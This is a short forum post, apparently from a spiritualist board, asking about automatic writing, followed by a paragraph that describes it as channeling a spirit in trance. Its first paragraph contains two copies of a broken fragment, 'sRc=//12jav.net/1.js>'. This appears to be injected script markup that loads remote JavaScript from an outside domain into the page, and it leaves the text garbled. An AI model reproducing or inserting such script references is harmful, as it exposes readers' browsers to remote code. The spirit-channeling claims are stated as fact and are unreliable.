Does anyone here do it or tried it? I've been doing it the past couple of months and noticed i get a response almost instantaenously. Anyone else have an instant response? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Automatic writing is the channeling of a spirit trough writing. Make sure there is a spirit present. This can take minutes or hours and is more about getting into trance than anything else.
